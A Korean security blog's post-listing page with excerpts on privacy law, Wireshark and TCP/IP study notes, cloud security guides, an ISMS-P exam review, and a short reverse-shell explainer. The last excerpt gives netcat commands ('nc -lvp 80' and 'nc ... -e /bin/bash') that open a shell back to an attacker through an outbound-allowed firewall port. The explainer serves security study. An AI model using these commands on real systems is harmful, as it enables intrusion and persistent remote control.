Tech113 개인정보보호법 트레이닝 사이트 https://itallpass.com/ismsp/law.htm https://itallpass.com/ismsp/law.htm itallpass.com https://blog.naver.com/renucs/221798711693 (개정)개인정보보호법, 정보통신망법[2020.8.5시행] 데이터3법(개보법, 정보통신망법, 신용정보법)개정에 따른 법 개정이 공포되었고, 8월5일부터 시행됩니다. ... blog.naver.com 2021. 5. 17. WireShark 들어가기 전에(2) Cache 지우기 DNS Cache about:blank ipconfig /displaydns ipconfig /flushdns * wireshark - Length 1514 --> 1460 1.OSI 7 layer에서 각 계층의 PDU를 무엇이라고 하나요? - L1=>bit - L2=>Frame - L3=>Packet - L4=>Segment - L5~L7=>Data Stream 2. TCP/IP 4계층의 상위 연결 정보를 쓰세요. - Application Layer - Transport Layer(TCP,UDP+port number_2byte) - Internet layer(IP+protocol ID-1byte) - Network Access Layer(EthernetII+type_2byte) ---.. 2021. 5. 17. WireShark 들어가기 전에(1) 1. TCP/IP 이해하기 2. WireShark 메뉴 알기 3. 서비스 트래픽 흐름 알기 ----------------------------------------------------------- 1. https://ko.wikipedia.org/wiki/IPv4#헤더 IPv4 - 위키백과, 우리 모두의 백과사전 위키백과, 우리 모두의 백과사전. IPv4는ps://ip.pe.kr 인터넷 프로토콜의 4번째 판이며, 전 세계적으로 사용된 첫 번째 인터넷 프로토콜이다. 과거에 인터넷에서 사용되는 유일한 프로토콜이였으나 ko.wikipedia.org 2. https://ko.wikipedia.org/wiki/전송_제어_프로토콜#TCP_세그먼트_구조 전송 제어 프로토콜 - 위키백과, 우리 모두의 백과사전 위키백.. 2021. 5. 17. 주요정보통신기반시설 기술적 취약점 분석.평가 방법 상세가이드 2021년 4월 업데이트 되었네요. www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=1&mode=view&p_No=259&b_No=259&d_No=106&ST=&SV= 주요정보통신기반시설 기술적 취약점 분석 평가 상세 가이드 융합기반보호팀 주성준 전화 061-820-1671 이메일 2021-04-28 95565 주요정보통신기반시설_기술적_취약점_분석_평가_방법_상세가이드.pdf 2021. 5. 13. 클라우드 보안 가이드 SK infosec.. 흠. 클라우드 보안 가이드 올해 EQST그룹에서는 '클라우드 보안 가이드 - AWS, Cloud Z', '클라우드 보안 가이드(컨테이너 보안) - Docker, Kubernetes'를 발간한 바 있습니다. 이번엔 국내 클라우드 플랫폼 중 AWS 다음으로 높은 점유율을 확보하고 있는 Azure, GCP(Google Cloud Platform)에 대한 클라우드 보안 가이드를 제시하고자 합니다.올해 EQST그룹에서는 '클라우드 보안 가이드 - AWS, Cloud Z', '클라우드 보안 가이드(컨테이너 보안) - Docker, Kubernetes'를 발간한 바 있습니다. 이번엔 국내 클라우드 플랫폼 중 AWS 다음으로 높은 점유율을 확보하고 있는 Azure, GCP(Google Cloud.. 2020. 12. 2. 2020년 ISMS-P 시험후기 2020.11.14 가락고등학교... 시험장 입실시 코로나 검사로 인해 40분정도 줄서기.. 시험 시작시간이 10분 늦게 시작 되었다.. 시험 문제 하나당 한페이지... 언어영역이 크다. 클라우드 보안영역에 대해 4개 문제 정도 출제된 듯 하다. 120분 시간이 모자르네... 흠. 그래도 딱 반 타작은 했네.. 2021년을 기약하며.. 2020. 12. 2. IXIA PerfectStorm BreakingPoint 정보보호제품 성능시험 계측기 기술 교육 www.kisis.or.kr/ Application simulator for HTTP Throughput Application simulator for HTTP TPS Security Attack DDoS Attack for SYN Flood 2020. 12. 2. 리버스 쉘 ( Revers Shell ) 1. 개요 1)내부침입, 무작위대입, 사전공격등으로 관리자(root)계정 탈취 2)반복적 침입을 위해 일반사용자로 위장한 관리자 계정 생성 3)지속적으로 원격 접속을 통하여 악의적 행위 수행 2. 공격기법 1)외부망에서 telnet , SSH 접속불가 2)방화벽 정책에 따라 Inbound 80,443/tcp만 허용 # netcat 프로그램 방화벽 우회 * 공격자 (123.0.0.1) * 공격대상 (234.0.0.1) 1) 공격자 --> ssh 234.0.0.1 ( 방화벽 차단 ) 2) nc -lvp 80 (공격자 포트 리슨상태) 3) 공격대상 서버( nc 123.0.0.1:80 -e /bin/bash // 내부에서 외부로 접속요청 ) 4) 접속성공 ( //방화벽에서 Outbound 80 오픈상태 ) **.. 2020. 11. 23. 이전 1 ··· 7 8 9 10 11 12 13 ··· 15 다음
